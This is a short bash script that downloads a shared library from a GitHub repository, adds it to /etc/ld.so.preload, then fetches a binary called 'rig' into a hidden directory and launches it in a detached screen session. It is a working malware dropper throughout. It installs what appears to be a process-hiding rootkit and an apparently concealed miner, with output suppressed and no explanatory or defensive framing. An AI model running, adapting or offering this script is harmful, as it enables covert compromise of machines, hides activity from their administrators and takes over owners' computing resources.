#!/bin/bash
mkdir /tmp/megalodon
mkdir /usr/local/games/.mega
apt-get install wget screen -y 1>/dev/null

if [ -s /usr/bin/wget ];
	then LDR="wget" ;
else apt update && apt upgrade -y && apt install wget && LDR="wget" ;
fi

if [ -s /usr/bin/screen ];
	then ATTACH="screen" ;
else apt install screen && ATTACH="screen" ;
fi

$LDR https://github.com/0x-raafet/Megalodon/raw/52792cfb57c1679b89796dd18ef42ed511598d70/libprhid.so -O /tmp/megalodon

cp /tmp/megalodon/libprhid.so /usr/local/lib/

chmod +x /usr/local/lib/libprhid.so

echo /usr/local/lib/libprhid.so >> /etc/ld.so.preload

$LDR https://github.com/0x-raafet/Megalodon/raw/main/rig -O /tmp/megalodon

cp /tmp/megalodon/rig /usr/local/games/.mega/

$ATTACH /usr/local/games/.mega/rig